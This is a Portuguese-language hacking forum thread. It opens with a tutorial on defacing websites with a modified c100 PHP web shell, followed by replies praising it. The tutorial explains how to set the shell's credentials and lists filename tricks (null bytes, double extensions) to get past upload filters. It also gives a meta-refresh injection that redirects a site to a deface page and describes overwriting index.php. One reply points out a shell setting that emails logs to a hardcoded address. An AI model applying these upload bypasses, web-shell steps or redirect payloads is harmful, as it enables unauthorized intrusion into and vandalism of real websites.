Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

[tut] desfigurando site d eoutro jeito+ sempre com shell

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    [tut] desfigurando site d eoutro jeito+ sempre com shell

    Aqui vou mostrar-lhe como desfigurar um site

    rimeiro de tudo você vai precisar shell. Eu te darei modificado shell c100 que eu uso e é indetectável. Link Download: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... Primeiro quando você baixar c100.php você precisará editá-lo com o notepad. E definir o seu nome de usuário e senha, de modo que somente quem sabe user / pw pode acessar shell e website.



    Ti verde Username parte, e passowrd editar como você gosta. Mas o passe deve ser md5 crypted. Para que você vá para Crypo.com - Aqui você vai fazer o seu pas MD5



    Assim por diante crypo.com você escreve a senha que você writed em c100.php no meu caso é hakforums e para que eu recebo essa senha MD5, copie e cole no nosso c100.php shell

    Código:
    20e1f7d5481da19bf736569eb047e20c
    Então, no meu caso c100 deve ficar assim

    Código:
    $ Login = "Dimitrije" / login / 
    / / NÃO ESQUECEU SOBRE SENHA! 
    pass $ = "hakforums"; / senha / 
    $ md5_pass = "b54f268a2badf26e2499631f37d7b12e"; / / pass-md5 cryped. se nulo, md5 ($ pass)
    Quando você faz isso, salve-o e agora encontrar em lugar site onde você pode fazer upload de algum arquivo. Às vezes, o site será bloqueado. Php, assim você terá de contornar isso. Primeiro, abra o seu shell com o notepad e, em seguida, Salvar como e altere a extensão de uma dessas

    Código:
    shell.php;.jpg
    c100.php%00.jpg
    c100.php..jpg
    c100.php.jpg%00
    c100.php.jpg:;
    c100.php.jpg%;
    c100.php.jpg;
    c100.php.jpg;%00
    c100.php.jpg%00:;
    Se o site não tem nenhum lugar onde você pode fazer upload de arquivos, mas tem lugar onde você pode adicionar notícias ou novo evento ou algo que você pode usar meta http-equiv para fazer o redirecionamento de site para sua página desfigurar. Você faz isso adicionando este código em notícias

    Código:
    <meta http-equiv="refresh" content="0;url=http://link_to_your_defacee_page">

    Depois de encontrar o seu painel de administração de upload shell, se você não pode carregar. Php upload diretamente com extensões modificadas como afirmei acima.



    Depois que você fizer o upload encontrar o link onde você fizer o upload, exemplo, se você fizer o upload de imagens, então ele irá a site/images/c100.php Depois de inserir o link do novo Pop up vai aparecer e ele irá pedir para login. Aqui você escreve seu nome de usuário e sua senha escreveu em c100.php. Depois que você deve começar a próxima tela.



    Pesquisar index.php principal e editá-lo com seu código-fonte desfigurar página e clique em salvar. É isso

  • Font Size
    #2
    muito bom,porem não utilizo shell
    eu coloco sempre a quele script de redirecionamento para minha pagina defacer ;S
    (bem menos trabalho)

    Comment


    • Font Size
      #3
      Posso alterar essa linha aqui tbm?

      Código:
      $log_Email = "Qurd_Az@Box.Az"; //Default e-mail for sending logs
      .-.
      ---


      Agradeça a todos que ajudam bastando clicar em "Obrigado"

      Comment


      • Font Size
        #4
        kgustavok:

        sim existe varios jeitos de se desfigurar um site sim com um script ou com shell

        Ohniugan

        sim pode modificar eu num estou lembrado
        muito bem mas eu vo da uma pesquisada melhor e vejo oque da para melhorar muito obrigado por questionar o topico

        Comment


        • Font Size
          #5
          Muito bom em!
          Valeu!
          "Não existe solução para estupidez do internauta."
          Kevin Mitnick

          Comment


          • Font Size
            #6
            O tuto ta ótimo, mostra um site fácil de criptografar sua senha em md5, além de mostrar os métodos de burlar o uploader do site assim upando a shell, Parabéns ;D
            mais essa linha que eu colei é um e-mail pra onde vai os logs da shell, por isso eu aconselho a mudar, pode colocar o seu e-mail mesmo.
            ---


            Agradeça a todos que ajudam bastando clicar em "Obrigado"

            Comment


            • Font Size
              #7
              Ohniugan

              SI MUITO OBRIGADO EU VO VOLTAR A ESTUDAR DEFACES E VOU FAZER NOVOS TUTORIAS PARA A RAPAZIADA DO FORUM AQUI VLW

              Comment


              • Font Size
                #8
                Explica essas coisas melhor para um iniciante porfavor.....
                E link download nao ta pegando

                Comment


                • Font Size
                  #9
                  Tutorial mito bom cara,
                  pra quem ta iniciando e uma ajuda relevante.

                  Comment

                  X
                  Working...
                  X